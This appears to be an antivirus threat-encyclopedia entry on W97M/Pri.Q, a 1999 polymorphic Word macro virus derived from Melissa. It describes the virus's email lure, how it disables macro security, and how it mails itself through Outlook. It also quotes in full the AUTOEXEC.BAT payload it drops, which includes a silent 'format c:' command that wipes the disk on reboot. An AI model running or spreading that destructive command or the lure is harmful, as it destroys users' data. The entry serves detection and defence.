W97M/Pri.Q
Threat risk
|
Detection files published:
24 Nov 1999 |
Description created:
1999-11-24 |
Description updated:
1999-11-24 |
|
Alias:
W97M/Melissa.X, W97M/Melissa.AG, W97M/Prilissa.A. |
Spreading mechanism
Email, File Infection | |
|
Payload:
| ||
Summary
Thist is a regular polymorphic virus that also containing the mass-replication mechanism of W97M/Melissa.A.
Spreading description
Email characteristics:
Subject: Message From
Body: This document is very Important and you've GOT to read this !!!
Attachment: (infected file)
The W97M/Pri.Q virus will start to disable certain settings. If the virus detects that Office2000 is in use, it will disable the Macro|Security menu item, otherwise, it assumes Office97 and will disable the Tools|Macro menu item.
If the Registry key
HKEY_CURRENT_USER\Software\Microsoft\Office\CyberNET
does not equal "(C)1999 - Indonesia by AnomOke!" the virus will e-mail the infected document using Microsoft Outlook to the first 50 entries in the address book.
When the messages are sent, W97M/Pri.Q will set the above-mentioned key in the registry, preventing the virus to send out another series of infected documents.
After the e-mail session, W97M/Pri.Q will check if the date is 25 December of any year to drop its payload. Next the virus will call its polymorphic routine changing the appearance making detection for conventional scanners difficult.
Threat description
Every 25 December W97M/Pri.Q will deliver its payload. First it will overwrite the AUTOEXEC.BAT in the Root-directory on drive C: with this content:
@echo off@echo Vine...Vide...Vice...Moslem Power Never End...
@echo Your Computer Have Just Been Terminated By -= CyberNET =- Virus!!!
ctty nul
format c: /autotest /q /u
The next time the system is rebooted, the hard disk will be formatted and all the information will be wiped.
After dropping the trojanized AUTOEXEC.BAT file, the virus will display this Message Box on the screen:
Vine...Vide...Vice...Moslem Power Never End...Yo
p Dare Rise Against Me... The Human Era is Over. The CyberNET Era Has Come !!!
This is then followed by a series of different shapes moving on the screen.
